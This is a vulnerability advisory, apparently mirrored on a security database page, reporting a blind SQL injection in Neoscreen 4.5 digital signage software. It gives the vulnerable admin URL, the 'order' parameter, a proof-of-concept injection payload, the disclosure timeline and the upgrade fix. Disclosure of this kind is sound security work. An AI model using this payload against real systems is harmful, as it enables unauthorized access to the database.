Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Neoscreen 4.5 Blind SQL Injection

🗓️ 25 Jul 2016 00:00:00Reported by Alex HaynesType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 35 Views

Neoscreen 4.5 Blind SQL Injection in Cube Digital Media Neoscreen digital signage software v4.

Code
`Exploit Title: Neoscreen Blind SQL injection  
Product: Neoscreen by Cube Digital Media  
Vulnerable Versions: 4.5 and all previous versions  
Tested Version: 4.5  
Advisory Publication: July 24, 2016  
Vulnerability Type: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') [CWE-89]  
CVE Reference: NONE  
Credit: Alex Haynes  
  
Advisory Details:  
  
  
(1) Vendor & Product Description  
--------------------------------  
  
Vendor:  
Cube Digital Media  
  
Product & Version:  
Neoscreen digital signage software v4.5  
  
Vendor URL & Download:  
http://www.cube-display.fr  
  
Product Description:  
"Neoscreen is an innovative, scalable and particularly powerful communication system.   
With just a few clicks, you can control all your dynamic display screens from your PC, wherever they may be in the world. "  
  
  
(2) Vulnerability Details:  
--------------------------  
Several URL's in the management software are vulnerable to SQL injection attacks.  
  
Proof of concept:  
  
POST TO /cubelocal/modules/neoscreen/admindiff/stats_diffusion.asp?mod_stat=&machine_id=0&idpod=0 HTTP/1.1  
  
Vulnerable parameter: order  
  
Payload:  
  
idpod_choisi=tous&periodeMM=1&periodeMMFin=12&periodeAA=2015&order=IIF(5968=5968,5968,1/0)&orders=0  
  
  
(3) Advisory Timeline:  
----------------------  
25/01/2016 - First Contact: vendor responds saying they are working on fix  
24/02/2016 - Follow up e-mail to request fix timeline. No vendor response.  
03/03/2016 - Follow up e-mail to request fix timeline.  
04/03/2016 - Vendor responds saying fix will be available 14/03/2016.  
  
  
(4)Solution:  
------------  
Upgrade to version 5.0  
  
  
(5) Credits:  
------------  
Discovered by Alex Haynes  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
25 Jul 2016 00:00Current
sql injectioncube digital medianeoscreen 4.5vulnerabilitypatchvendorsoftwarecommunication system
35